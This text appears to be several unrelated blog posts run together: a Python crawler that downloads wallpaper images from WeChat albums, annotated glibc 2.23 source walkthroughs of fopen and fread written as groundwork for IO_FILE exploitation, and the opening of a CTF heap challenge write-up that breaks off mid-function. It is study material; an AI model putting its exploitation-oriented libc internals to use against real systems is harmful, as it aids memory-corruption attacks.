        #self.target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2119868775733706753&scene=173&from_msgid=2247561088&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
        self.target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2342983337092759553&scene=173&from_msgid=2247561474&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
        self.html = urlopen(self.target)
        self.bsObj = BeautifulSoup(self.html, "html.parser")
        self.link_list = self.GetLinks(self.bsObj)
        return self.link_list

    def Getimage(self, bsObj):
        self.images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
        return self.images

    def GetName(self, bsObj):
        # try both title prefixes; the three characters after the prefix must be digits
        self.title = bsObj.find("h1", {"class": "rich_media_title"})
        self.name = self.title.string.split('【二次元动漫壁纸】')[-1][:3]
        if self.name.isdigit():
            return "image-" + self.name
        else:
            self.name = self.title.string.split('【二次元壁纸分享】')[-1][:3]
            if self.name.isdigit():
                return "image-" + self.name
            else:
                return None

    def GetLinks(self, bsObj):
        self.links = bsObj.findAll("li", {"class": "album__list-item js_album_item js_wx_tap_highlight wx_tap_cell"})
        self.link_list = []
        for link in self.links:
            if link.attrs['data-link'] is not None:
                if link.attrs['data-link'] not in self.link_list:
                    self.link_list.append(link.attrs['data-link'])
        return self.link_list

    def DownloadTogether(self, images, name):
        self.i = 0
        for image in images:
            self.i += 1
            self.n += 1
            self.response = image.attrs["data-src"]
            self.num = name + "-" + str(self.i)
            self.dtype = self.response.split('=')[-1]
            self.num += '.' + self.dtype
            self.response = req.get(self.response)
            print("finish!!!, now you get " + str(self.n) + " => " + self.num)
            # hard-coded absolute save path
            self.path = os.path.join("D:\\PythonProject\\Images", self.num)
            with open(self.path, 'wb') as f:
                f.write(self.response.content)

    def Start(self):
        self.link_list = self.GetAllURL()
        for link in self.link_list:
            if self.stop == 1:
                print("OK quit....")
                return None
            self.bsObj = self.GetNextURL(link)
            self.images = self.Getimage(self.bsObj)
            self.name = self.GetName(self.bsObj)
            if self.name is not None:
                self.DownloadTogether(self.images, self.name)

    def Stop(self):
        self.stop = 1

if __name__ == "__main__":
    crawler = Crawler()
    crawler.Start()

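Changelog:

  • version:v1.3
  • date:2022.5.14
  • type:
    • Features:
      • Functions organized into a class
      • Added a Stop feature
      • Fixed some bugs
    • Changed:
      • The save path is now fixed (hard-coded as an absolute path)
    • Removed:
      • Separate storage was removed; only unified storage is left
  • desc:
    • This crawler was made for the desktop pet; it gains almost nothing in functionality (some features were even cut)

IO_FILE source analysis: fread

When a program reads data from the keyboard, it first stores the data in the input buffer.

Straight to the source: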

_IO_size_t
_IO_fread (buf, size, count, fp)
void *buf;
_IO_size_t size;
_IO_size_t count;
_IO_FILE *fp;
{
_IO_size_t bytes_requested = size * count;
_IO_size_t bytes_read;
CHECK_FILE (fp, 0); /* basic sanity check */
if (bytes_requested == 0)
return 0;
_IO_cleanup_region_start ((void (*) __P ((void *))) _IO_funlockfile, fp);
_IO_flockfile (fp);
bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested); /* the core call */
_IO_funlockfile (fp);
_IO_cleanup_region_end (0);
return bytes_requested == bytes_read ? count : bytes_read / size;
}
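
The return expression on the last line of _IO_fread is worth a quick check on numbers: fread reports complete items, not bytes. The sketch below restates that expression; fread_return is a hypothetical name and bytes_read stands for whatever _IO_sgetn returned.

```python
def fread_return(size, count, bytes_read):
    """Items reported by fread for a request of `count` items of `size` bytes."""
    bytes_requested = size * count
    if bytes_requested == 0:
        return 0
    if bytes_read == bytes_requested:
        return count
    return bytes_read // size  # a partially read item is not counted


if __name__ == "__main__":
    print(fread_return(4, 10, 40))  # everything was read
    print(fread_return(4, 10, 18))  # short read: only whole items count
```

A short read of 18 bytes with 4-byte items is reported as 4 items; the 2 trailing bytes are not counted.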

_IO_fread relies on _IO_sgetn for its real work; the other calls are auxiliary:

_IO_size_t
_IO_sgetn (fp, data, n)
_IO_FILE *fp;
void *data;
_IO_size_t n;
{
/* FIXME handle putback buffer here! */
return _IO_XSGETN (fp, data, n);
}

Continuing into _IO_XSGETN:

#define _IO_XSGETN(FP, DATA, N) JUMP2 (__xsgetn, FP, DATA, N)

_IO_size_t
_IO_file_xsgetn (fp, data, n)
_IO_FILE *fp;
void *data;
_IO_size_t n;
{
register _IO_size_t want, have;
register _IO_ssize_t count;
register char *s = data; /* points at the destination that receives the data */

want = n;

if (fp->_IO_buf_base == NULL) /* the input buffer has not been set up */
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp); /* set up the input buffer */
}

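while (want > 0) /* want is the number of bytes still needed */
{
have = fp->_IO_read_end - fp->_IO_read_ptr; /* bytes currently available in the input buffer */
if (want <= have) /* the input buffer holds enough */
{
memcpy (s, fp->_IO_read_ptr, want); /* copy straight from the input buffer to the destination */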
fp->_IO_read_ptr += want;
want = 0;
}
else /* the input buffer does not hold enough */
{
if (have > 0) /* use up what the buffer does hold first */
{
#ifdef _LIBC
s = __mempcpy (s, fp->_IO_read_ptr, have);
#else
memcpy (s, fp->_IO_read_ptr, have);
s += have;
#endif
want -= have;
fp->_IO_read_ptr += have;
}

/* Check for backup and repeat */
if (_IO_in_backup (fp)) /* backup-area check, can be skipped */
{
_IO_switch_to_main_get_area (fp);
continue;
}

if (fp->_IO_buf_base && want < fp->_IO_buf_end - fp->_IO_buf_base)
{
if (__underflow (fp) == EOF)
/* issue the read system call and store the data in the input buffer */
break;

continue;
}

_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
/* reset the FILE structure's pointers */

count = want;
if (fp->_IO_buf_base)
{
_IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
if (block_size >= 128)
count -= want % block_size;
}

count = _IO_SYSREAD (fp, s, count);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN;

break;
}

s += count;
want -= count;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
}
}

return n - want;
}

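_IO_file_xsgetn is the core function behind fread. It has three parts:

  • Part one handles fp->_IO_buf_base being NULL, which means the FILE structure's pointers have not been initialized and the input buffer has not been set up; _IO_doallocbuf is called to initialize the pointers and set up the input buffer
  • Part two handles the input buffer holding enough data; the data is copied straight from the buffer to the destination buffer
  • Part three handles the input buffer being empty or unable to satisfy the whole request; __underflow is called to read data into the buffer through a system call, and the data is then copied from the buffer to the user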
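
The three parts can be sketched as a toy reader. It is a simplification, not a port: the direct _IO_SYSREAD path for requests larger than the buffer and the backup area are left out, and ReaderModel, source and refills are names invented for the illustration.

```python
class ReaderModel:
    """Toy model of the buffered read path described above."""

    def __init__(self, source, capacity=8):
        self.source = bytes(source)  # stands in for the file behind read(2)
        self.pos = 0                 # how much of the source has been consumed
        self.capacity = capacity     # size of the input buffer
        self.allocated = False       # part 1: has the buffer been set up?
        self.buf = b""               # unread bytes in the input buffer
        self.refills = 0             # how many simulated read calls happened

    def _underflow(self):
        # Role of __underflow: refill the buffer with one simulated read.
        chunk = self.source[self.pos:self.pos + self.capacity]
        self.pos += len(chunk)
        self.buf = chunk
        self.refills += 1
        return len(chunk) > 0        # False models EOF

    def read(self, want):
        out = bytearray()
        if not self.allocated:       # part 1: set up the buffer once
            self.allocated = True
        while want > 0:
            if want <= len(self.buf):    # part 2: the buffer holds enough
                out += self.buf[:want]
                self.buf = self.buf[want:]
                want = 0
            else:                        # part 3: drain, then refill
                out += self.buf
                want -= len(self.buf)
                self.buf = b""
                if not self._underflow():
                    break
        return bytes(out)


if __name__ == "__main__":
    r = ReaderModel(b"0123456789ABCDEF", capacity=8)
    print(r.read(3), r.read(7), r.read(100), r.refills)
```

The second read in the example drains the 5 bytes left in the buffer, refills it once, and takes the remaining 2 bytes from the fresh data, which is the loop back into part two described above.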

Setting up the input buffer

If the input buffer has not been set up, the program calls _IO_doallocbuf to set it up:

void
_IO_doallocbuf (fp)
_IO_FILE *fp;
{
if (fp->_IO_buf_base) /* the buffer already exists: return right away (a second check) */
return;
if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
/* the stream is not _IO_UNBUFFERED, or fp->_mode is greater than 0 */
if (_IO_DOALLOCATE (fp) != EOF) /* vtable call (_IO_file_doallocate) */
return;
_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
/* set _IO_buf_base and _IO_buf_end */
/* fallback: for an unbuffered stream, or when _IO_DOALLOCATE fails (so its inner _IO_setb never ran), */
/* the one-byte _shortbuf is used as the buffer */
}

If the condition holds, the vtable's _IO_file_doallocate is called (the routine that actually sets up the input buffer):

# define ALLOC_BUF(_B, _S, _R) \
do { \
(_B) = (char *) mmap (0, ROUND_TO_PAGE (_S), \
PROT_READ | PROT_WRITE, \
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \
if ((_B) == (char *) MAP_FAILED) \
return (_R); \
} while (0)

int
_IO_file_doallocate (fp)
_IO_FILE *fp;
{
_IO_size_t size;
int couldbetty;
char *p;
struct _G_stat64 st;

#ifndef _LIBC
if (_IO_cleanup_registration_needed)
(*_IO_cleanup_registration_needed) ();
#endif

if (fp->_fileno < 0 || _IO_SYSSTAT (fp, &st) < 0)
/* get the file information (vtable->__stat) */
{
couldbetty = 0;
size = _IO_BUFSIZ;
#if 0
/* do not try to optimise fseek() */
fp->_flags |= __SNPT;
#endif
}
else
{
couldbetty = S_ISCHR (st.st_mode);
#if _IO_HAVE_ST_BLKSIZE
size = st.st_blksize <= 0 ? _IO_BUFSIZ : st.st_blksize;
#else
size = _IO_BUFSIZ;
#endif
}
ALLOC_BUF (p, size, EOF); /* allocate memory with mmap */
_IO_setb (fp, p, p + size, 1);
if (couldbetty && isatty (fp->_fileno))
fp->_flags |= _IO_LINE_BUF;
return 1;
}

After getting the file information, the ALLOC_BUF macro allocates the memory, and then _IO_setb is called:

void
_IO_setb (f, b, eb, a)
_IO_FILE *f;
char *b;
char *eb;
int a;
{
if (f->_IO_buf_base && !(f->_flags & _IO_USER_BUF))
FREE_BUF (f->_IO_buf_base, _IO_blen (f));
f->_IO_buf_base = b;
f->_IO_buf_end = eb;
if (a) /* update the _IO_USER_BUF flag */
f->_flags &= ~_IO_USER_BUF;
else
f->_flags |= _IO_USER_BUF;
}

This sets _IO_buf_base and _IO_buf_end.

Copying data straight from the buffer to the destination buffer

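while (want > 0) /* want is the number of bytes still needed */
{
have = fp->_IO_read_end - fp->_IO_read_ptr; /* bytes currently available in the input buffer */
if (want <= have) /* the input buffer holds enough */
{
memcpy (s, fp->_IO_read_ptr, want); /* copy straight from the input buffer to the destination */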
fp->_IO_read_ptr += want;
want = 0;
}
........

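This part is simple: once the input buffer is known to hold enough data, it is copied straight to the user's buffer (the destination).

Reading data through a system call

If the input buffer is empty or cannot satisfy the whole request, __underflow is called: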

int
__underflow (fp)
_IO_FILE *fp;
{
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
if (fp->_vtable_offset == 0 && _IO_fwide (fp, -1) != -1)
return EOF;
#endif

if (fp->_mode == 0)
_IO_fwide (fp, -1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_get_mode (fp) == EOF)
return EOF;
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
}
if (_IO_have_markers (fp))
{
if (save_for_backup (fp, fp->_IO_read_end))
return EOF;
}
else if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
return _IO_UNDERFLOW (fp); /* vtable->_IO_new_file_underflow */
}

Everything before the last line is checks and can be skipped; the call to _IO_UNDERFLOW at the end is what matters (it is really _IO_new_file_underflow from the vtable):

# define _IO_new_file_underflow _IO_file_underflow

int
_IO_new_file_underflow (fp)
_IO_FILE *fp;
{
_IO_ssize_t count;
#if 0
/* SysV does not make this test; take it out for compatibility */
if (fp->_flags & _IO_EOF_SEEN)
return (EOF);
#endif

if (fp->_flags & _IO_NO_READS) /* does _flags contain the _IO_NO_READS bit? */
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL) /* call _IO_doallocbuf to allocate the input buffer */
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* Flush all line buffered files before reading. */
/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
_IO_flush_all_linebuffered ();

_IO_switch_to_get_mode (fp);

/* Reset the FILE's read/write pointers so that they all point at fp->_IO_buf_base */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
/* _IO_SYSREAD == vtable->__read (_IO_file_read), which ends up calling read() */
/* read() fills fp->_IO_buf_base; the requested length is the size of the input buffer */
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count; /* extend the valid region of the input buffer */
if (count == 0)
return EOF;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}

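When the function returns, control is back in _IO_file_xsgetn. Because of the while loop, the second part runs again: this time the input buffer is copied into the destination buffer, and the function finally returns.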
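The copy-then-refill loop described above can be modelled in a few lines. This is only a sketch under simplifying assumptions: `ModelFile`, `underflow` and `xsgetn` are hypothetical names, pointers are replaced by indexes, and the real function's shortcut of reading large requests directly into the user's buffer is left out.

```python
import io


class ModelFile:
    """Toy model of the read side of a FILE: one buffer plus read_ptr/read_end."""

    def __init__(self, source: bytes, buf_size: int = 8):
        self.source = io.BytesIO(source)  # stands in for the file descriptor
        self.buf_size = buf_size          # models _IO_buf_end - _IO_buf_base
        self.buf = b""                    # contents of the input buffer
        self.read_ptr = 0                 # index model of _IO_read_ptr
        self.read_end = 0                 # index model of _IO_read_end

    def underflow(self) -> bool:
        """Refill the buffer with a single read(); False means EOF."""
        self.buf = self.source.read(self.buf_size)
        self.read_ptr, self.read_end = 0, len(self.buf)
        return self.read_end > 0

    def xsgetn(self, want: int) -> bytes:
        out = bytearray()
        while want > 0:
            have = self.read_end - self.read_ptr
            if have == 0:
                # Buffer exhausted: refill it, then loop back to the copy step.
                if not self.underflow():
                    break
                continue
            n = min(want, have)
            out += self.buf[self.read_ptr:self.read_ptr + n]
            self.read_ptr += n
            want -= n
        return bytes(out)


f = ModelFile(b"hello world, FILE!", buf_size=8)
print(f.xsgetn(5), f.read_ptr, f.read_end)
```

After the first call the buffer still holds three unread bytes, which is why the next request is partly served from the buffer and partly from a fresh refill.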


In the IO_FILE arbitrary-read technique (reading an arbitrary address through stdin), the key function is _IO_new_file_underflow, which contains a flag check:

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}

I am not familiar with this vulnerability yet; I will go through it once I know it better.
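To see what the _IO_NO_READS test means for a concrete _flags value, here is a small decoder. It is a sketch: the bit values are the ones I recall from glibc 2.23's libio.h, `decode_flags` and `underflow_allowed` are hypothetical helper names, and 0xfbad2088 is used as a typical stdin value by assumption.

```python
# Low bits of FILE._flags (values as in glibc 2.23's libio.h).
FLAG_BITS = {
    0x0001: "_IO_USER_BUF",
    0x0002: "_IO_UNBUFFERED",
    0x0004: "_IO_NO_READS",
    0x0008: "_IO_NO_WRITES",
    0x0010: "_IO_EOF_SEEN",
    0x0020: "_IO_ERR_SEEN",
    0x0080: "_IO_LINKED",
    0x0800: "_IO_CURRENTLY_PUTTING",
    0x1000: "_IO_IS_APPENDING",
    0x2000: "_IO_IS_FILEBUF",
}
_IO_NO_READS = 0x0004


def decode_flags(flags: int) -> list:
    """Return the names of the known flag bits set in `flags`."""
    return [name for bit, name in sorted(FLAG_BITS.items()) if flags & bit]


def underflow_allowed(flags: int) -> bool:
    """Model of the check: reading is refused when _IO_NO_READS is set."""
    return not (flags & _IO_NO_READS)


print(decode_flags(0xFBAD2086), underflow_allowed(0xFBAD2086))  # stderr value from the dump at the top
print(decode_flags(0xFBAD2088), underflow_allowed(0xFBAD2088))  # assumed typical stdin value
```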

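IO_FILE source analysis: fopen

After doing several IO_FILE pwn challenges in a row, I realized I did not really understand how IO_FILE vulnerabilities work, so I decided to study the IO_FILE source code.

The plan is to read the source first and study the low-level principles of exploitation afterwards.

Thanks to raycp for the source walkthrough!!!


fopen is one of the most important IO functions: it is the first function called whenever we want to open a file.

Here is its source (libc-2.23):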

#include "libioP.h"
#ifdef __STDC__
#include <stdlib.h>
#endif
#ifdef _LIBC
# include <shlib-compat.h>
#else
# define _IO_new_fopen fopen
#endif

_IO_FILE *
_IO_new_fopen (filename, mode)
const char *filename;
const char *mode;
{
struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
} *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));
/* malloc allocates the memory */
if (new_f == NULL)
return NULL;
#ifdef _IO_MTSAFE_IO
new_f->fp.file._lock = &new_f->lock;
#endif
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
_IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);
#else /* _IO_no_init initializes the FILE structure */
_IO_no_init (&new_f->fp.file, 1, 0, NULL, NULL);
#endif
_IO_JUMPS (&new_f->fp) = &_IO_file_jumps; /* install the _IO_file_jumps function table */
_IO_file_init (&new_f->fp); /* _IO_file_init links the structure into the _IO_list_all list */
#if !_IO_UNIFIED_JUMPTABLES
new_f->fp.vtable = NULL;
#endif
if (_IO_file_fopen ((_IO_FILE *) new_f, filename, mode, 1) != NULL)
return (_IO_FILE *) &new_f->fp; /* _IO_file_fopen made the system call that opens the file */
_IO_un_link (&new_f->fp);
free (new_f);
return NULL;
}

#ifdef _LIBC
strong_alias (_IO_new_fopen, __new_fopen)
versioned_symbol (libc, _IO_new_fopen, _IO_fopen, GLIBC_2_1);
versioned_symbol (libc, __new_fopen, fopen, GLIBC_2_1);
#endif

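fopen is really _IO_new_fopen. Most of it is initialization:

  • malloc allocates the memory
  • _IO_no_init null-initializes the FILE structure
  • _IO_file_init links the structure into the _IO_list_all list
  • _IO_file_fopen makes the system call that opens the file

Each step is analyzed in turn below:

malloc: allocating the memory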

*new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));

locked_FILE is a structure that wraps the FILE structure. It has three members:

  struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
}

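malloc allocates sizeof (struct locked_FILE) bytes. Inside fopen the block is freed only on the failure path (when _IO_file_fopen returns NULL); on success it stays allocated until fclose.

_IO_no_init: null-initializing the FILE structure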

void
_IO_no_init (fp, flags, orientation, wd, jmp)
_IO_FILE *fp;
int flags;
int orientation;
struct _IO_wide_data *wd;
struct _IO_jump_t *jmp;
{
fp->_flags = _IO_MAGIC|flags;
fp->_IO_buf_base = NULL;
fp->_IO_buf_end = NULL;
fp->_IO_read_base = NULL;
fp->_IO_read_ptr = NULL;
fp->_IO_read_end = NULL;
fp->_IO_write_base = NULL;
fp->_IO_write_ptr = NULL;
fp->_IO_write_end = NULL;
fp->_chain = NULL; /* Not necessary. */

fp->_IO_save_base = NULL;
fp->_IO_backup_base = NULL;
fp->_IO_save_end = NULL;
fp->_markers = NULL;
fp->_cur_column = 0;
#if _IO_JUMPS_OFFSET
fp->_vtable_offset = 0;
#endif
#ifdef _IO_MTSAFE_IO
_IO_lock_init (*fp->_lock);
#endif
fp->_mode = orientation;
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
if (orientation >= 0)
{
fp->_wide_data = wd; /* initialize fp's _wide_data field */
fp->_wide_data->_IO_buf_base = NULL;
fp->_wide_data->_IO_buf_end = NULL;
fp->_wide_data->_IO_read_base = NULL;
fp->_wide_data->_IO_read_ptr = NULL;
fp->_wide_data->_IO_read_end = NULL;
fp->_wide_data->_IO_write_base = NULL;
fp->_wide_data->_IO_write_ptr = NULL;
fp->_wide_data->_IO_write_end = NULL;
fp->_wide_data->_IO_save_base = NULL;
fp->_wide_data->_IO_backup_base = NULL;
fp->_wide_data->_IO_save_end = NULL;

fp->_wide_data->_wide_vtable = jmp;
}
#endif
}

This clears the members of the _IO_FILE part of _IO_FILE_plus, then assigns _wide_data and clears its members as well.

_IO_file_init: linking the structure into the _IO_list_all list

# define _IO_new_file_init _IO_file_init

void
_IO_new_file_init (fp)
struct _IO_FILE_plus *fp;
{
fp->file._offset = _IO_pos_BAD;
fp->file._IO_file_flags |= CLOSED_FILEBUF_FLAGS;

_IO_link_in (fp);
fp->file._fileno = -1;
}

This function does a little setup (ignore it for now) and then calls _IO_link_in:

void
_IO_link_in (fp)
struct _IO_FILE_plus *fp;
{
if ((fp->file._flags & _IO_LINKED) == 0)
/* check whether the FILE structure already carries the _IO_LINKED flag */
{
fp->file._flags |= _IO_LINKED;
#ifdef _IO_MTSAFE_IO
_IO_lock_lock (list_all_lock); /* lock */
#endif
fp->file._chain = (_IO_FILE *) _IO_list_all;
_IO_list_all = fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock); /* unlock */
#endif
}
}
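As a rough model of what _IO_link_in does to the list, the sketch below uses hypothetical `FileNode` and `FileList` classes in place of the real structures and ignores locking.

```python
class FileNode:
    def __init__(self, name: str):
        self.name = name
        self.chain = None    # models fp->file._chain
        self.linked = False  # models the _IO_LINKED flag


class FileList:
    def __init__(self):
        self.head = None     # models the global _IO_list_all

    def link_in(self, fp: FileNode) -> None:
        if fp.linked:        # already on the list: nothing to do
            return
        fp.linked = True
        fp.chain = self.head  # the new node points at the old head
        self.head = fp        # and becomes the new head

    def names(self) -> list:
        out, node = [], self.head
        while node is not None:
            out.append(node.name)
            node = node.chain
        return out


files = FileList()
for name in ("stdin", "stdout", "stderr", "new_f"):
    files.link_in(FileNode(name))
print(files.names())
```

The most recently linked FILE is always reached first when the list is walked, which is what FSOP-style attacks rely on when they replace the list head.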

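The current value of _IO_list_all is written into fp's _chain field (which points to the next node of the FILE list), and then fp is written into _IO_list_all. fp is now the head of the FILE list (the global _IO_list_all always points to the head of the list).

// Standard head insertion, much like fastbin, smallbin and unsortedbin

_IO_file_fopen: opening the file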

# define _IO_new_file_fopen _IO_file_fopen

_IO_FILE *
_IO_new_file_fopen (fp, filename, mode, is32not64)
_IO_FILE *fp;
const char *filename;
const char *mode;
int is32not64;
{
int oflags = 0, omode;
int read_write;
int oprot = 0666;
int i;
_IO_FILE *result;
#if _LIBC
const char *cs;
#endif

if (_IO_file_is_open (fp)) /* is the file already open? */
return 0;
switch (*mode) /* set the open mode (access and type) */
{
case 'r':
omode = O_RDONLY; /* read-only */
read_write = _IO_NO_WRITES;
break;
case 'w':
omode = O_WRONLY; /* write-only */
oflags = O_CREAT|O_TRUNC;
read_write = _IO_NO_READS;
break;
case 'a':
omode = O_WRONLY; /* write-only */
oflags = O_CREAT|O_APPEND;
read_write = _IO_NO_READS|_IO_IS_APPENDING;
break;
default:
__set_errno (EINVAL); /* set the error code */
return NULL;
}
for (i = 1; i < 4; ++i)
{
switch (*++mode) /* handle the mode modifiers */
{
case '\0': /* no more modifiers */
break;
case '+': /* read and write access */
omode = O_RDWR;
read_write &= _IO_IS_APPENDING;
continue;
case 'x': /* exclusive create (O_EXCL), not an execute permission */
oflags |= O_EXCL;
continue;
case 'b': /* binary mode: nothing to do */
default:
continue;
}
break;
}

result = _IO_file_open (fp, filename, omode|oflags, oprot, read_write,
is32not64);
/* _IO_file_open calls open() to open the file; the rest can be ignored */

#if _LIBC
/* Test whether the mode string specifies the conversion. */
cs = strstr (mode, ",ccs=");
if (cs != NULL)
{
/* Yep. Load the appropriate conversions and set the orientation
to wide. */
struct gconv_fcts fcts;
struct _IO_codecvt *cc;

if (! _IO_CHECK_WIDE (fp) || __wcsmbs_named_conv (&fcts, cs + 5) != 0)
{
/* Something went wrong, we cannot load the conversion modules.
This means we cannot proceed since the user explicitly asked
for these. */
_IO_new_fclose (result);
return NULL;
}

cc = fp->_codecvt = &fp->_wide_data->_codecvt;

/* The functions are always the same. */
*cc = __libio_codecvt;

cc->__cd_in.__cd.__nsteps = 1; /* Only one step allowed. */
cc->__cd_in.__cd.__steps = fcts.towc;

cc->__cd_in.__cd.__data[0].__invocation_counter = 0;
cc->__cd_in.__cd.__data[0].__internal_use = 1;
cc->__cd_in.__cd.__data[0].__flags = __GCONV_IS_LAST;
cc->__cd_in.__cd.__data[0].__statep = &result->_wide_data->_IO_state;

cc->__cd_out.__cd.__nsteps = 1; /* Only one step allowed. */
cc->__cd_out.__cd.__steps = fcts.tomb;

cc->__cd_out.__cd.__data[0].__invocation_counter = 0;
cc->__cd_out.__cd.__data[0].__internal_use = 1;
cc->__cd_out.__cd.__data[0].__flags = __GCONV_IS_LAST;
cc->__cd_out.__cd.__data[0].__statep = &result->_wide_data->_IO_state;

/* Set the mode now. */
result->_mode = 1;
}
#endif /* GNU libc */

return result;
}

The function first checks whether the file is already open, then sets the open mode in the switch-case.
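The mode parsing can be mirrored in a short sketch. `parse_mode` is a hypothetical helper that follows only the switch shown above, using Python's `os.O_*` constants for the open flags and the three _flags bits (values as in glibc 2.23's libio.h) for read_write.

```python
import os

_IO_NO_READS, _IO_NO_WRITES, _IO_IS_APPENDING = 0x4, 0x8, 0x1000


def parse_mode(mode: str):
    """Return (open_flags, read_write) for an fopen-style mode string."""
    first = mode[:1]
    if first == "r":
        omode, oflags, read_write = os.O_RDONLY, 0, _IO_NO_WRITES
    elif first == "w":
        omode, oflags, read_write = os.O_WRONLY, os.O_CREAT | os.O_TRUNC, _IO_NO_READS
    elif first == "a":
        omode, oflags = os.O_WRONLY, os.O_CREAT | os.O_APPEND
        read_write = _IO_NO_READS | _IO_IS_APPENDING
    else:
        raise ValueError("EINVAL")  # models __set_errno (EINVAL); return NULL
    for ch in mode[1:4]:            # the C loop looks at no more than three further characters
        if ch == "+":
            omode = os.O_RDWR
            read_write &= _IO_IS_APPENDING  # drop NO_READS / NO_WRITES
        elif ch == "x":
            oflags |= os.O_EXCL
        # 'b' and anything else is ignored
    return omode | oflags, read_write


print(parse_mode("r"), parse_mode("w+"), parse_mode("a+"))
```

Note how '+' clears both _IO_NO_READS and _IO_NO_WRITES: that is the bit the underflow check tests later.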


fopen is only the appetizer and has no vulnerability of its own; fread, up next, is the main course.

x_heap

➜  桌面 ./chall                                  
1.add
2.delete
3.edit
4.show
>

file / checksec output:

 chall: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a9ca4e5f4f591a5343f4c0d406006bde41b14d38, stripped                             
[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

64-bit, dynamically linked, all protections enabled

GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11) stable release versio
➜  桌面 seccomp-tools dump ./chall 
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
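Read as plain logic, the filter above amounts to three kill conditions. The sketch below restates it; `seccomp_verdict` is a hypothetical helper, the constants are taken from the dump, and 59 is the x86-64 execve syscall number.

```python
AUDIT_ARCH_X86_64 = 0xC000003E
SYS_EXECVE = 59  # 0x3b


def seccomp_verdict(arch: int, nr: int) -> str:
    """Mirror rules 0000-0007 of the dumped filter."""
    if arch != AUDIT_ARCH_X86_64:            # rule 0001
        return "KILL"
    if nr >= 0x40000000 and nr != 0xFFFFFFFF:  # rules 0003-0004: x32 ABI syscall numbers
        return "KILL"
    if nr == SYS_EXECVE:                     # rule 0005
        return "KILL"
    return "ALLOW"                           # rule 0006


for name, nr in (("read", 0), ("write", 1), ("open", 2), ("execve", 59)):
    print(name, seccomp_verdict(AUDIT_ARCH_X86_64, nr))
```

open, read and write all stay allowed, which is why an ORW chain is the natural way to get the flag.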

Vulnerability analysis

unsigned __int64 delete()
{
int index; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("which chunk you want to delete?");
scanf("%d", &index);
if ( index < 0 || index > 7 )
{
puts("index error.");
}
